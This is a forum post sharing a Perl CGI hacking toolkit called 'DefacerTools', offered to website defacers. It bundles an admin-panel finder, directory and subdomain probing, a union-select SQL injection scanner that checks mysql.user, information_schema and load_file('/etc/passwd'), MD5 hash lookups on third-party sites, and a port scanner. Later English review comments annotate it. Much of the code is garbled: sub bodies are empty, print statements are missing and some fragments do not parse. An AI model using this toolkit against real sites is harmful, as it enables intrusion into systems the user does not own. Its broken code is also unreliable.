Hola, acá les traigo un regalo de Navidad que hice en 3 horas: es un programa CGI para usar en webs que lo soporten. Hice todas las pruebas con XAMPP y, al parecer, todo funciona bien.
Las funciones del programa son:
- HexConverter
- PanelFinder
- PathsFinder
- SQLi Scanner
- FuzzDNS
- FinderPass
- PortScanner
El código del programa (formateado con perltidy) es:
defacertools.cgi#!"\xampp\perl\bin\perl.exe"
#
#DefacerTools 0.5
#
#(C) Doddy Hackman 2012
#
#
use CGI;
use LWP::UserAgent;
use URI
::Split qw(uri_split
); use HTML::LinkExtor;
use IO::Socket;
# Wordlist of relative admin/login paths. The panel-finder action appends
# each entry to the submitted base URL and requests it, so one run issues one
# request per entry below.
# NOTE(review): declared without `my` and the file has no `use strict`, so
# this is a package global.
# Defender's view: a single client requesting these paths back to back is the
# log signature of this kind of enumeration.
@panels = (
'admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx',
'admin/login.aspx', 'admin/index.aspx',
'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx',
'asp/admin/admin.asp', 'asp/admin/admin.aspx',
'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
'admin/', 'login.asp',
'login.aspx', 'admin.asp',
'admin.aspx', 'webmaster.aspx',
'webmaster.asp', 'login/index.asp',
'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp',
'login/admin.aspx', 'administracion/index.asp',
'administracion/index.aspx', 'administracion/login.asp',
'administracion/login.aspx', 'administracion/webmaster.asp',
'administracion/webmaster.aspx', 'administracion/admin.asp',
'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php',
'admin/login.php', 'admin/system.php',
'admin/ingresar.php', 'admin/administrador.php',
'admin/default.php', 'administracion/',
'administracion/index.php', 'administracion/login.php',
'administracion/ingresar.php', 'administracion/admin.php',
'administration/', 'administration/index.php',
'administration/login.php', 'administrator/index.php',
'administrator/login.php', 'administrator/system.php',
'system/', 'system/login.php',
'admin.php', 'login.php',
'administrador.php', 'administration.php',
'administrator.php', 'admin1.html',
'admin1.php', 'admin2.php',
'admin2.html', 'yonetim.php',
'yonetim.html', 'yonetici.php',
'yonetici.html', 'adm/',
'admin/account.php', 'admin/account.html',
'admin/index.html', 'admin/login.html',
'admin/home.php', 'admin/controlpanel.html',
'admin/controlpanel.php', 'admin.html',
'admin/cp.php', 'admin/cp.html',
'cp.php', 'cp.html',
'administrator/', 'administrator/index.html',
'administrator/login.html', 'administrator/account.html',
'administrator/account.php', 'administrator.html',
'login.html', 'modelsearch/login.php',
'moderator.php', 'moderator.html',
'moderator/login.php', 'moderator/login.html',
'moderator/admin.php', 'moderator/admin.html',
'moderator/', 'account.php',
'account.html', 'controlpanel/',
'controlpanel.php', 'controlpanel.html',
'admincontrol.php', 'admincontrol.html',
'adminpanel.php', 'adminpanel.html',
'admin1.asp', 'admin2.asp',
'yonetim.asp', 'yonetici.asp',
'admin/account.asp', 'admin/home.asp',
'admin/controlpanel.asp', 'admin/cp.asp',
'cp.asp', 'administrator/index.asp',
'administrator/login.asp', 'administrator/account.asp',
'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp',
'moderator/admin.asp', 'account.asp',
'controlpanel.asp', 'admincontrol.asp',
'adminpanel.asp', 'fileadmin/',
'fileadmin.php', 'fileadmin.asp',
'fileadmin.html', 'administration.html',
'sysadmin.php', 'sysadmin.html',
'phpmyadmin/', 'myadmin/',
'sysadmin.asp', 'sysadmin/',
'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/',
'Server.php', 'Server.html',
'Server.asp', 'Server/',
'wp-admin/', 'administr8.php',
'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/',
'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/',
'admins/', 'admins.php',
'admins.asp', 'admins.html',
'administrivia/', 'Database_Administration/',
'WebAdmin/', 'useradmin/',
'sysadmins/', 'admin1/',
'system-administration/', 'administrators/',
'pgadmin/', 'directadmin/',
'staradmin/', 'ServerAdministrator/',
'SysAdmin/', 'administer/',
'LiveUser_Admin/', 'sys-admin/',
'typo3/', 'panel/',
'cpanel/', 'cPanel/',
'cpanel_file/', 'platz_login/',
'rcLogin/', 'blogindex/',
'formslogin/', 'autologin/',
'support_login/', 'meta_login/',
'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/',
'showlogin/', 'memlogin/',
'members/', 'login-redirect/',
'sub-login/', 'wp-login/',
'login1/', 'dir-login/',
'login_db/', 'xlogin/',
'smblogin/', 'customer_login/',
'UserLogin/', 'login-us/',
'acct_login/', 'admin_area/',
'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/',
'sql-admin/', 'radmind/',
'openvpnadmin/', 'wizmysqladmin/',
'vadmind/', 'ezsqliteadmin/',
'hpwebjetadmin/', 'newsadmin/',
'adminpro/', 'Lotus_Domino_Admin/',
'bbadmin/', 'vmailadmin/',
'Indy_admin/', 'ccp14admin/',
'irc-macadmin/', 'banneradmin/',
'sshadmin/', 'phpldapadmin/',
'macadmin/', 'administratoraccounts/',
'admin4_account/', 'admin4_colon/',
'radmind-1/', 'Super-Admin/',
'AdminTools/', 'cmsadmin/',
'SysAdmin2/', 'globes_admin/',
'cadmins/', 'phpSQLiteAdmin/',
'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/', 'server/',
'database_administration/', 'power_user/',
'system_administration/', 'ss_vms_admin_sm/'
);
my @dns = ('www');
#my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
# Shared HTTP client: toma() and tomar() both send their requests through
# $nave, so every outbound request carries the User-Agent set here and uses a
# 5-second timeout.
# NOTE(review): as printed on this page the agent string has no space between
# "Gecko/20080201" and "Firefox/2.0.0.12". Matching the exact string in
# web-server access logs is a cheap way to spot traffic from this script.
my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);
# Copy every request parameter that CGI.pm parsed into %rta; the if/elsif
# dispatcher that follows picks an action from whichever key is set.
# NOTE(review): nothing on this page authenticates the caller before the
# dispatcher runs, so anyone who can reach the script can make the hosting
# server send the requests and connection attempts the actions perform.
my %rta;
# NOTE(review): `new CGI` is indirect-object syntax; `CGI->new` is the
# unambiguous spelling.
my $que = new CGI;
my @ques = $que->param;
for (@ques) {
$rta{$_} = $que->param($_);
}
# The header is written before any action runs, so all later output is HTML.
print "Content-type:text/html\n\n";
<style type=text/css>
.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}
#pie {
position: absolute;
bottom: 0;
}
body,a:link {
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}
input,table.outset,table.bord,table,textarea,select {
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}
a:link,a:visited,a:active {
color: #00FF00;
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}
</style>";
if ( $rta{'hex'} ) {
logouno();
qq(<form method
=post action
=''><b>Text to encode
: </b
><input type
=text name
=textocode value
=test
><input type
=submit name
=codificar value
=Encode
></form
>); copyright();
}
elsif ( $rta{'textocode'} ) {
logouno();
print "[+] Encode : <b>" . encode
( $rta{'textocode'} ) . "</b><br><br>"; copyright();
}
elsif ( $rta{'panelfinder'} ) {
logodos();
qq(<form method
=post action
=''><b>Page
: </b
><input type
=text name
=buscarpanel value
=http
://localhost
/><input type
=submit value
=Find
></form
>); copyright();
}
elsif ( $rta{'buscarpanel'} ) {
# Panel-finder action: for each @panels entry, request "<page>/<entry>" via
# tomax() and list the ones whose response reports success.
# NOTE(review): $page is the raw `buscarpanel` request parameter. It is
# interpolated into the HTML output without escaping (reflected markup
# injection) and used as the request target without any validation.
# NOTE(review): $path and $code are undeclared globals (no `use strict`).
my $page = $rta{'buscarpanel'};
logodos();
print "<br>[+] Scanning $page<br><br>"; for $path (@panels) {
# tomax()'s body is not on this page; presumably it returns the response
# object, since is_success is called on the result -- TODO confirm.
$code = tomax( $page . "/" . $path );
if ( $code->is_success ) {
print "[Link] : " . $page . "/" . $path . "<br>"; }
}
print "<br><br>[+] Finish<br>"; copyright();
}
elsif ( $rta{'pathsfinder'} ) {
logotres();
qq(<form method
=post action
=''><b>Page
: </b
><input type
=text name
=buscarpaths value
=http
://localhost
/doddy
><input type
=submit name
=codificar value
=Find
></form
>); copyright();
}
elsif ( $rta{'buscarpaths'} ) {
# Paths-finder action: fetch the submitted page, extract its links, request
# the directory part of each link on that link's host, and report responses
# that contain "Index of ..." (a directory-listing page).
# NOTE(review): $page is the raw `buscarpaths` parameter; it is fetched
# without validation and later echoed into the HTML output unescaped.
logotres();
my $page = $rta{'buscarpaths'};
my $code = toma($page);
my @links = get_links($code);
print "<br><br>[+] Finding paths<br><br>";
for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
# NOTE(review): $path1 comes from the submitted URL and is used as a regex
# without \Q...\E, so metacharacters in it are interpreted as pattern syntax.
$page =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;
# $repetidos is an undeclared global holding the directories already tried.
# NOTE(review): $parche is taken from links in the fetched page (remote
# content) and is also interpolated into a regex unquoted; a substring match
# is used, so a directory that is a prefix of an earlier one is skipped.
unless ( $repetidos =~ /$parche/ ) {
$repetidos .= " " . $parche;
# The request always uses http://, whatever scheme the link had.
my $code = toma( "http://" . $auth . $parche );
if ( $code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
# NOTE(review): $dir_found is text from the remote response and is printed
# into the HTML output without escaping.
print "[+] Directory Found : $page/$dir_found<br>"; }
}
}
}
}
print "<br><br>[+]Finished<br>"; copyright();
}
elsif ( $rta{'sqliscanner'} ) {
logocuatro();
qq(<form method
=post action
=''><b>Page
: </b
><input type
=text name
=buscarsql value
=http
://localhost
/sql
.php
?id
=><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscarsql'} ) {
# SQLi-scanner action: hands the raw `buscarsql` parameter to a user-defined
# sub named `length`; the `&` sigil is what selects that sub instead of the
# builtin of the same name.
# NOTE(review): only one argument is passed, so any second argument the
# callee reads (it reads $_[1] in the body shown on this page) is undefined.
logocuatro();
print "<br><br>[+] Scanning page<br><br>"; &length( $rta{'buscarsql'} );
print "<br><br>[+] Finished"; copyright();
}
elsif ( $rta{'fuzzdns'} ) {
logocinco();
qq(<form method
=post action
=''><b>Host
: </b
><input type
=text name
=buscardns value
=google
.com
><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscardns'} ) {
# FuzzDNS action: despite the name, this sends an HTTP request (through
# tomax) to "http://<label>.<host>" for each label in @dns and lists the ones
# whose response reports success; no DNS query is issued directly here.
# NOTE(review): $page is the raw `buscardns` parameter, echoed into the HTML
# output unescaped and used to build the request target without validation.
# NOTE(review): $code is an undeclared global.
logocinco();
my $page = $rta{'buscardns'};
print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>"; for my $path (@dns) {
$code = tomax( "http://" . $path . "." . $page );
if ( $code->is_success ) {
print "[+] Found : http://" . $path . "." . $page . "<br>"; }
}
print "<br><br>[+] Finished<br><br>"; copyright();
}
elsif ( $rta{'finderpass'} ) {
logoseis();
qq(<form method
=post action
=''><b>MD5
: </b
><input type
=text name
=buscarhash value
=202cb962ac59075b964b07152d234b70
><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscarhash'} ) {
# FinderPass action: passes the raw `buscarhash` parameter to crackit().
# NOTE(review): the value is not checked to look like an MD5 digest before
# crackit() echoes it into the page and sends it to the sites it queries.
logoseis();
&crackit( $rta{'buscarhash'} );
copyright();
}
elsif ( $rta{'portscanner'} ) {
logosiete();
qq(<form method
=post action
=''><b>IP
: </b
><input type
=text name
=buscarpuertos value
=localhost
><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscarpuertos'} ) {
# PortScanner action: passes the raw `buscarpuertos` parameter to scanuno(),
# which attempts TCP connections from the hosting server to that address.
# NOTE(review): the target is not validated, so the connections can be aimed
# at addresses only the hosting server can reach.
logosiete();
scanuno( $rta{'buscarpuertos'} );
copyright();
}
elsif ( $rta{'home'} ) {
sintax();
}
else {
sintax();
}
sub sintax {
<title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
<br><br>
<h1><center>DefacerTools</center></h1>
<br><br>
<center>
<table border=1>
<td class=main><center><b>Tools</b></center></td><tr>
<td class
=main
><a href
=?hex=true
><center>HexConverter
</center
></a
></td
><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
<td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
<td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
<td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
<td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
<td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
</table>
</center>
);
}
sub logouno {
<center>
<pre>
@ @ @@@@
@ @ @ @ @
@ @ @ @
@ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@
@@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @
@ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @
</pre>
);
}
sub logodos {
<center>
<pre>
@@@@@ @ @@@@@ @ @
@ @ @ @ @
@ @ @ @ @
@ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@
@@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @
@ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @
</pre>
);
}
sub logotres {
<center>
<pre>
@@@@@ @ @@@@@ @ @
@ @ @ @ @ @
@ @ @ @ @ @
@ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@
@@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @
@ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @
</pre>
);
}
sub logocuatro {
<center>
<pre>
@@@ @@@@ @ @ @@@
@ @ @ @ @ @ @ @
@ @ @ @ @ @
@ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@
@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
@ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
@
</pre>
);
}
sub logocinco {
<center>
<pre>
@@@@@ @@@@ @ @ @@@
@ @ @ @@ @ @ @
@ @ @ @@ @ @
@ @ @ @@@@ @@@@ @ @ @ @ @ @
@@@@ @ @ @ @ @ @ @ @ @ @@@
@ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @@ @
@ @ @@ @ @ @ @ @ @@ @ @
@ @@ @ @@@@ @@@@ @@@@ @ @ @@@
</pre>
);
}
sub logoseis {
<center>
<pre>
@@@@@ @ @ @@@@@
@ @ @ @
@ @ @ @
@ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@
@@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @
@ @ @ @ @ @ @@@@@ @ @ @@@@ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@
</pre>
);
}
sub logosiete {
<center>
<pre>
@@@@@ @@@
@ @ @ @ @
@ @ @ @
@ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@
@@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
@ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
</pre>
);
}
sub copyright {
qq(<br><br><br><br><br><br><br><center><a href
=?home
=true
><b>Return to home
</b
></a
></center
><br><br>); }
# Fragment: the `sub` line that opens this body is not on the page (the final
# closing brace below belongs to it). The dispatcher's `&length(...)` call
# suggests this is that sub -- TODO confirm.
# What the visible code does: for each candidate column count from 2 to 200
# it builds a URL from the supplied page plus a "union select" list of
# char(...)-wrapped RATSXPDOWN<n>RATSXPDOWN markers, fetches it with toma(),
# and looks for the marker text in the response body.
# Defender's view: one run can send up to 199 GET requests to the same URL,
# each longer than the last and each containing "union", "select" and a
# growing run of "char(" in the query string; RATSXPDOWN is the string to
# look for in responses. The loop has no `last`, so it keeps going after a
# match.
# NOTE(review): $pass1, $pass2, $alert, $total, $injection, $test, @number
# and $control are undeclared globals; the outer `my $rows = "0"` is shadowed
# by the loop variable.
print "<br>[+] Looking for the number of columns<br><br>"; my $rows = "0";
my $asc;
my $page = $_[0];
( $pass1, $pass2 ) = &bypass( $_[1] );
# ascii()'s body is not on this page; its return value is placed inside
# "char(" ... ")".
$alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
$total = "1";
for my $rows ( 2 .. 200 ) {
$asc .=
"," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
$total .= "," . $rows;
$injection =
$page . "1"
. $pass1 . "and"
. $pass1 . "1=0"
. $pass1 . "union"
. $pass1
. "select"
. $pass1
. $alert
. $asc;
$test = toma($injection);
if ( $test =~ /RATSXPDOWN/ ) {
@number = $test =~ m{RATSXPDOWN
(\d+)RATSXPDOWN
}g
; $control = 1;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
my $save = $auth;
# The first reflected column number in $total is replaced by the placeholder
# word "hackman", which details() later splits on.
# NOTE(review): the statement that follows the substitution starts with a
# bare "." -- the beginning of that statement (presumably a print) is
# missing from the page, so this fragment does not parse as shown.
$total =~ s/$number[0]/hackman/;
. $page . "1"
. $pass1 . "and"
. $pass1 . "1=0"
. $pass1 . "union"
. $pass1
. "select"
. $pass1
. $total . "<br>";
details(
$page . "1"
. $pass1 . "and"
. $pass1 . "1=0"
. $pass1 . "union"
. $pass1
. "select"
. $pass1
. $total,
"--", ""
);
}
}
}
# details($page, $bypass, $save)
# Takes a URL containing the placeholder word "hackman", splits it around
# that word, and sends four follow-up requests through toma() that put a
# marker expression in the placeholder's position. It then prints which
# responses contained the marker.
#   $page   - URL string with the "hackman" placeholder
#   $bypass - separator style passed on to bypass()
#   $save   - accepted but not used in the body shown here
# Literals worth knowing when reading logs:
#   char(69,82,84,79,82,56,53,52) are the character codes of "ERTOR854", the
#   marker every regex below searches for;
#   0x2f6574632f706173737764 is the hex encoding of "/etc/passwd".
# Defender's view: those two literals, together with "information_schema.tables",
# "mysql.user" and "load_file(" in a request URL, are stable signatures of
# this script's probes.
# NOTE(review): $pass1, $pass2, $inforschema, $mysqluser, $test1..$test3,
# $concat, $injection and $code are undeclared globals.
sub details {
my ( $page, $bypass, $save ) = @_;
( $pass1, $pass2 ) = &bypass($bypass);
if ( $page =~ /(.*)hackman(.*)/ig ) {
print "<br>[+] Searching information..<br><br>"; my ( $start, $end ) = ( $1, $2 );
$inforschema =
$start
. "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
. $end
. $pass1 . "from"
. $pass1
. "information_schema.tables"
. $pass2;
$mysqluser =
$start
. "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
. $end
. $pass1 . "from"
. $pass1
. "mysql.user"
. $pass2;
$test3 =
toma( $start
. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
. $end
. $pass2 );
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ( $test2 =~ /ERTOR854/ig ) {
print "[mysql.user] : ON<br>"; }
else {
print "[mysql.user] : OFF<br>"; }
if ( $test1 =~ /ERTOR854/ig ) {
print "[information_schema.tables] : ON<br>"; }
else {
print "[information_schema.tables] : OFF<br>"; }
# Unlike the two checks above, this one has no OFF branch.
if ( $test3 =~ /ERTOR854/ig ) {
print "[load_file] : ON<br>"; }
$concat =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start . $concat . $end . $pass2;
$code = toma($injection);
if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
# NOTE(review): as shown this is a bare string expression, so nothing is
# printed; the `print` appears to be missing from the page. The captures are
# text from the remote response and would be emitted unescaped.
"<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
}
else {
print "<br>[-] Not found any data<br>"; }
}
}
# encode($string): called by the HexConverter action, which prints the return
# value inside <b>...</b>.
# NOTE(review): the loop body is empty on this page, so as shown nothing is
# appended to $hex and no value is explicitly returned; the per-character
# conversion appears to be missing. $hex is an undeclared global.
sub encode {
my $string = $_[0];
$hex = '0x';
for ( split //, $string ) { }
}
# bypass($style)
# Returns the pair (separator, terminator) that the scanner code splices
# between the words of the request strings it builds:
#   "/*"  -> ("/**/", "/**/")
#   "%20" -> ("%20",  "%00")
#   anything else, including no argument -> ("+", "--")
# Defender's view: rules written to match this script's requests should treat
# "/**/", "%20" and "+" as interchangeable word separators.
sub bypass {
    my ($style) = @_;

    return ( "/**/", "/**/" ) if $style eq "/*";
    return ( "%20", "%00" ) if $style eq "%20";
    return ( "+", "--" );
}
# NOTE(review): the body of this sub is missing from the page. Its callers
# place the return value between "char(" and ")", so it presumably returns
# the character codes of its argument as a comma-separated list -- TODO
# confirm against the original file.
sub ascii {
}
# toma($url): GET $url with the shared $nave client and return the response
# body, whatever the status of the response.
# NOTE(review): the URL is used exactly as passed in. Callers hand it request
# parameters, so scheme and host are chosen by whoever calls the CGI script.
sub toma {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}
# NOTE(review): the body of this sub is missing from the page. Callers invoke
# ->is_success on its return value, so it presumably returns the response
# object of a request made with $nave rather than the body text -- TODO
# confirm against the original file.
sub tomax {
}
# get_links($html): feeds the HTML text in $_[0] to HTML::LinkExtor with
# agarrar() as the per-tag callback.
# NOTE(review): as shown, the callback only unpacks its arguments and the sub
# has no return statement, although the caller assigns the result to a list
# of links; the code that collects and returns them appears to be missing
# from the page.
# NOTE(review): $test is an undeclared global. A named sub declared inside
# another sub is still a package-level sub in Perl, not a closure, and
# `my $a` in the callback shadows the $a used by sort.
sub get_links {
$test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
sub agarrar {
my ( $a, %b ) = @_;
}
}
# crackit($md5): looks the given MD5 digest up on the third-party sites keyed
# in %hash. For each site it either appends the digest to the URL ('get') or
# calls tomar() with the 'variables' entry ('post'), then prints whatever the
# site's 'regex' captures from the response.
# NOTE(review): the digest is sent to every site listed, all over plain
# http://, so it is disclosed to those operators and to anyone on the path.
# NOTE(review): $_[0] is echoed into the HTML output unescaped, and the
# captured text from the remote response is printed unescaped as well.
# NOTE(review): the 'variables' values are single-quoted strings, not hash
# references, so `$_[0]` inside them is not interpolated and tomar() receives
# a string where it dereferences a hash -- TODO confirm what is actually
# posted.
# NOTE(review): the single-quoted 'regex' values contain the literal text
# `$_[0]`; once interpolated into /.../ that text is read as pattern syntax
# rather than replaced by the digest, so those patterns may never match as
# written -- TODO confirm.
# NOTE(review): the two qq(...) patterns are split across lines on this page,
# and the non-ASCII text in the last one looks like Windows-1251 Cyrillic
# rendered as Latin-1; both are probably extraction damage.
sub crackit {
my $secret = $_[0];
print "<br><br>[+] Cracking $_[0]<br><br>";
my %hash = (
'http://passcracking.com/' => {
'tipo' => 'post',
'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex' =>
'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},
'http://md5.hashcracking.com/search.php?md5=' => {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' => {
'tipo' => 'post',
'variables' => '{"query" => $_[0], "submit" => " Crack "}',
'regex' =>
'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' => {
'tipo' => 'post',
'variables' =>
'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\
/div
><div class
="result">$_[0]:(.+)<br\
/>), },
'http://www.hashchecker.com/index.php?_sls=search_hash' => {
'tipo' => 'post',
'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
'regex' =>
'<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' => {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí
: <b>(.*)<\
/b
><br><form action
=\
"\">), }
);
# Hash keys come back in no fixed order, so the sites are queried in a
# different order from run to run. $code is an undeclared global.
for my $data ( keys %hash ) {
if ( $hash{$data}{tipo} eq "get" ) {
$code = toma( $data . $_[0] );
if ( $code =~ /$hash{$data}{regex}/ig ) {
print "<br>[+] Decoded : " . $1 . "<br><br>";
print $secret. ":" . $1 . "<br>";
}
}
else {
$code = tomar( $data, $hash{$data}{variables} );
if ( $code =~ /$hash{$data}{regex}/ig ) {
print $secret. ":" . $1 . "<br>";
}
}
}
print "<br>[+] Finish<br>";
}
# tomar($web, $var): POST to $web with the shared $nave client, using the
# key/value pairs of the hash that $var refers to as form fields, and return
# the response body.
# NOTE(review): $var is dereferenced as a hash without checking that it is a
# hash reference; with no `use strict` in the file, a plain string here is
# treated as the name of a package hash instead of raising an error.
sub tomar {
    my ( $web, $var ) = @_;
    my @form_fields = %{$var};
    my $response    = $nave->post( $web, \@form_fields );
    return $response->content;
}
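# scanuno($target)
# Attempts a TCP connection from the hosting server to $target on each port
# in %ports (0.5 s timeout per attempt) and prints one HTML line for every
# port that accepted the connection.
#   $target - host name or address, taken by the caller from the
#             `buscarpuertos` request parameter
# Prints HTML to STDOUT; the return value is not meaningful.
# NOTE(review): $target is not validated, so any visitor of the CGI script
# decides which address the hosting server connects to, including addresses
# only that server can reach.
sub scanuno {
    my ($target) = @_;

    my %ports = (
        "21"   => "ftp",
        "22"   => "ssh",
        "25"   => "smtp",
        "80"   => "http",
        "110"  => "pop3",
        "3306" => "mysql"
    );

    # The target is request data: escape it before it goes into the page so
    # that markup in the parameter is shown as text instead of being rendered.
    my $shown_target = CGI::escapeHTML($target);
    print "<br>[+] Scanning $shown_target<br><br><br>";

    # Numeric order makes the output stable from run to run.
    for my $port ( sort { $a <=> $b } keys %ports ) {
        my $socket = IO::Socket::INET->new(
            PeerAddr => $target,
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 0.5
        );
        next unless $socket;

        # Only reachability matters; release the connection straight away.
        close $socket;

        print "[Port] : "
          . $port
          . " [Service] : "
          . $ports{$port} . "<br>";
    }

    print "<br><br>[+] Scan Finish<br>";
}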
# The End ?